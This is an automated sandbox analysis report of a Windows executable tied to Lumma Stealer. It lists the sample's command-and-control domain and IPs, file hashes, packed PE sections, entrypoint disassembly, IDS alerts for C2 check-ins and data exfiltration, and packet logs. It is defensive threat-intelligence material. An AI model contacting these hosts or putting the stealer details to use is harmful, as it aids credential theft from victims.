                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchzi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&uzi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&ctazi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgzi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://mindhandru.buzz/Kzi042476Iv.exe, 00000000.00000003.1381810990.00000000012E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYizi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://mindhandru.buzz/Ozi042476Iv.exe, 00000000.00000003.1527140960.0000000005CC8000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526983311.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://support.mozilla.org/products/firefoxgro.allzi042476Iv.exe, 00000000.00000003.1503355540.0000000006091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          172.67.165.185
                                                                                          		mindhandru.buzzUnited States
                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                          104.21.11.101
                                                                                          		unknownUnited States
                                                                                          		13335CLOUDFLARENETUStrue

                                                                                          General Information

                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1581216
                                                                                          Start date and time:2024-12-27 08:40:55 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 5m 14s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:5
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:zi042476Iv.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:e5c73b43bd01bb3580af440576a00ad3.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@1/0@2/2
                                                                                          EGA Information:Failed
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 0
                                                                                          • Number of non-executed functions: 1
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Stop behavior analysis, all processes terminated

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212, 4.245.163.56
                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target zi042476Iv.exe, PID 6492 because there are no executed function
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          02:41:49API Interceptor8x Sleep call for process: zi042476Iv.exe modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          172.67.165.185U7TAniYFeK.exeGet hashmaliciousLummaCBrowse
                                                                                            ZBbOXn0a3R.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                              P0SJULJxI0.exeGet hashmaliciousLummaCBrowse
                                                                                                r06aMlvVyM.exeGet hashmaliciousLummaCBrowse
                                                                                                  i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                    XM6cn2uNux.exeGet hashmaliciousLummaCBrowse
                                                                                                      rwFNJ4pHWG.exeGet hashmaliciousLummaCBrowse
                                                                                                        dEugughckk.exeGet hashmaliciousLummaCBrowse
                                                                                                          Solara-v3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                            https://click.jipolismall.de/i86/Get hashmaliciousUnknownBrowse
                                                                                                              104.21.11.101C8FtVPhuxd.exeGet hashmaliciousLummaCBrowse
                                                                                                                0zBsv1tnt4.exeGet hashmaliciousLummaCBrowse
                                                                                                                  cqHMm0ykDG.exeGet hashmaliciousLummaCBrowse
                                                                                                                    b0ho5YYSdo.exeGet hashmaliciousLummaCBrowse
                                                                                                                      ZX2M0AXZ56.exeGet hashmaliciousLummaCBrowse
                                                                                                                        0Pm0sadcCP.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                          TTsfmr1RWm.exeGet hashmaliciousLummaCBrowse
                                                                                                                            COBYmpzi7q.exeGet hashmaliciousLummaCBrowse
                                                                                                                              lBsKTx65QC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                https://out.novastellz.de/i45/Get hashmaliciousUnknownBrowse

                                                                                                                                  Domains

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  s-part-0035.t-0009.t-msedge.net54861 Proforma Invoice AMC2273745.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                  • 13.107.246.63
                                                                                                                                  TAX INVOICE - NBO2506000632.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                  • 13.107.246.63
                                                                                                                                  installer.batGet hashmaliciousVidarBrowse
                                                                                                                                  • 13.107.246.63
                                                                                                                                  din.exeGet hashmaliciousVidarBrowse
                                                                                                                                  • 13.107.246.63
                                                                                                                                  lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                  • 13.107.246.63
                                                                                                                                  atw3.dllGet hashmaliciousGozi, UrsnifBrowse
                                                                                                                                  • 13.107.246.63
                                                                                                                                  WRD1792.docx.docGet hashmaliciousDynamerBrowse
                                                                                                                                  • 13.107.246.63
                                                                                                                                  0zBsv1tnt4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 13.107.246.63
                                                                                                                                  pVbAZEFIpI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 13.107.246.63
                                                                                                                                  GxX48twWHA.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 13.107.246.63
                                                                                                                                  mindhandru.buzzC8FtVPhuxd.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.11.101
                                                                                                                                  U7TAniYFeK.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  0zBsv1tnt4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.11.101
                                                                                                                                  cqHMm0ykDG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.11.101
                                                                                                                                  ZBbOXn0a3R.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  P0SJULJxI0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  b0ho5YYSdo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.11.101
                                                                                                                                  r06aMlvVyM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  XM6cn2uNux.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  ZX2M0AXZ56.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.11.101

                                                                                                                                  ASNs

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  CLOUDFLARENETUSC8FtVPhuxd.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.11.101
                                                                                                                                  U7TAniYFeK.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                                                  • 172.64.41.3
                                                                                                                                  6wFwugeLNG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.135.139
                                                                                                                                  9mauyKC3JW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 172.67.153.243
                                                                                                                                  uUtgy7BbF1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.71.155
                                                                                                                                  x4PaiRVIyM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.175.134
                                                                                                                                  3vLKNycnrz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.62.151
                                                                                                                                  installer.batGet hashmaliciousVidarBrowse
                                                                                                                                  • 172.64.41.3
                                                                                                                                  skript.batGet hashmaliciousVidarBrowse
                                                                                                                                  • 162.159.61.3
                                                                                                                                  CLOUDFLARENETUSC8FtVPhuxd.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.11.101
                                                                                                                                  U7TAniYFeK.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                                                  • 172.64.41.3
                                                                                                                                  6wFwugeLNG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.135.139
                                                                                                                                  9mauyKC3JW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 172.67.153.243
                                                                                                                                  uUtgy7BbF1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.71.155
                                                                                                                                  x4PaiRVIyM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.175.134
                                                                                                                                  3vLKNycnrz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.62.151
                                                                                                                                  installer.batGet hashmaliciousVidarBrowse
                                                                                                                                  • 172.64.41.3
                                                                                                                                  skript.batGet hashmaliciousVidarBrowse
                                                                                                                                  • 162.159.61.3

                                                                                                                                  JA3 Fingerprints

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  a0e9f5d64349fb13191bc781f81f42e1C8FtVPhuxd.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  • 104.21.11.101
                                                                                                                                  U7TAniYFeK.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  • 104.21.11.101
                                                                                                                                  8lOT1rXZp5.exeGet hashmaliciousRedLineBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  • 104.21.11.101
                                                                                                                                  6wFwugeLNG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  • 104.21.11.101
                                                                                                                                  9mauyKC3JW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  • 104.21.11.101
                                                                                                                                  uUtgy7BbF1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  • 104.21.11.101
                                                                                                                                  x4PaiRVIyM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  • 104.21.11.101
                                                                                                                                  3vLKNycnrz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  • 104.21.11.101
                                                                                                                                  Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  • 104.21.11.101
                                                                                                                                  NewI Upd v1.1.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.165.185
                                                                                                                                  • 104.21.11.101

                                                                                                                                  Dropped Files

                                                                                                                                  No context

                                                                                                                                  Created / dropped Files

                                                                                                                                  No created / dropped files found

                                                                                                                                  Static File Info

                                                                                                                                  General

                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Entropy (8bit):6.537625101613762
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:zi042476Iv.exe
                                                                                                                                  File size:2'941'952 bytes
                                                                                                                                  MD5:e5c73b43bd01bb3580af440576a00ad3
                                                                                                                                  SHA1:e77f4d19f5b74853fddf4e03f8e73d04a67eeef6
                                                                                                                                  SHA256:73530f53798c09139cbc44033cc2259de175bbc508819527137da458d0d4dd73
                                                                                                                                  SHA512:0928550d0987e20bd713d2f7f721f74264d79173e96a9eca3b785b442f9b8b129f478229d26e517887b2d3aab1163b289728013aa0af5903da142d7ac51eea53
                                                                                                                                  SSDEEP:49152:W6JbMKz/Ul2onavv6etVq1KZXcHTkvyONi5c9xRO7O:xoSUl2onavv6e7q1FTBci5c9xQ
                                                                                                                                  TLSH:DDD54B92B80A72CFD89A27B49227CD46991D07B847240CD3FEAC75FA7E67DC112B5C24
                                                                                                                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig............................../...........@.........................../.....z.-...@.................................Y@..m..

                                                                                                                                  File Icon

                                                                                                                                  Icon Hash:00928e8e8686b000

                                                                                                                                  Static PE Info

                                                                                                                                  General

                                                                                                                                  Entrypoint:0x6fb000
                                                                                                                                  Entrypoint Section:.taggant
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                  Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:6
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:6
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:6
                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                  Entrypoint Preview

                                                                                                                                  Instruction
                                                                                                                                  jmp 00007F29FD381E6Ah
                                                                                                                                  cmpps xmm5, dqword ptr [eax+eax], 00h
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add cl, ch
                                                                                                                                  add byte ptr [eax], ah
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [edi], al
                                                                                                                                  or al, byte ptr [eax]
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], dh
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax+00000000h], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [edx], ah
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [ecx], al
                                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  adc byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add dword ptr [edx], ecx
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al

                                                                                                                                  Data Directories

                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                  Sections

                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                  0x10000x520000x264000b6cf7a75b7b9bc862e2e7569bd8adf1False0.9996234170751634data7.98432450240108IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  .rsrc 0x530000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  wwzrppjr0x550000x2a50000x2a46008b93293efcc0b3ed85d156687fade31dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  vmxrzajb0x2fa0000x10000x600fd558c738312657b37c75132e9f9b21fFalse0.5514322916666666data4.8852585514362366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  .taggant0x2fb0000x30000x22003ef8bca2f212cc9d7f3f0ce3d5603303False0.06502757352941177DOS executable (COM)0.8089428919387718IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                  Imports

                                                                                                                                  DLLImport
                                                                                                                                  kernel32.dlllstrcpy

                                                                                                                                  Network Behavior

                                                                                                                                  Suricata IDS Alerts

                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                  2024-12-27T08:41:49.256104+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949712172.67.165.185443TCP
                                                                                                                                  2024-12-27T08:41:49.994221+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949712172.67.165.185443TCP
                                                                                                                                  2024-12-27T08:41:49.994221+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949712172.67.165.185443TCP
                                                                                                                                  2024-12-27T08:41:51.309576+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949718172.67.165.185443TCP
                                                                                                                                  2024-12-27T08:41:52.092267+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.949718172.67.165.185443TCP
                                                                                                                                  2024-12-27T08:41:52.092267+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949718172.67.165.185443TCP
                                                                                                                                  2024-12-27T08:41:53.794022+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949724172.67.165.185443TCP
                                                                                                                                  2024-12-27T08:41:56.056067+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949730172.67.165.185443TCP
                                                                                                                                  2024-12-27T08:42:05.806654+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949752172.67.165.185443TCP
                                                                                                                                  2024-12-27T08:42:08.405022+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949758172.67.165.185443TCP
                                                                                                                                  2024-12-27T08:42:09.163141+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.949758172.67.165.185443TCP
                                                                                                                                  2024-12-27T08:42:11.074170+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949763104.21.11.101443TCP
                                                                                                                                  2024-12-27T08:42:11.079369+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.949763104.21.11.101443TCP
                                                                                                                                  2024-12-27T08:42:11.079369+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.949763104.21.11.101443TCP
                                                                                                                                  2024-12-27T08:42:15.831457+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949776104.21.11.101443TCP

                                                                                                                                  Network Port Distribution

                                                                                                                                  TCP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Dec 27, 2024 08:41:48.016693115 CET49712443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:48.016746044 CET44349712172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:48.016891003 CET49712443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:48.020178080 CET49712443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:48.020195961 CET44349712172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:49.256022930 CET44349712172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:49.256103992 CET49712443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:49.275922060 CET49712443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:49.275949955 CET44349712172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:49.276281118 CET44349712172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:49.331265926 CET49712443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:49.333623886 CET49712443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:49.333653927 CET49712443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:49.333786964 CET44349712172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:49.994230986 CET44349712172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:49.994319916 CET44349712172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:49.994410038 CET49712443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:49.996479988 CET49712443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:49.996500969 CET44349712172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:50.005513906 CET49718443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:50.005548000 CET44349718172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:50.005649090 CET49718443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:50.005924940 CET49718443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:50.005935907 CET44349718172.67.165.185192.168.2.9
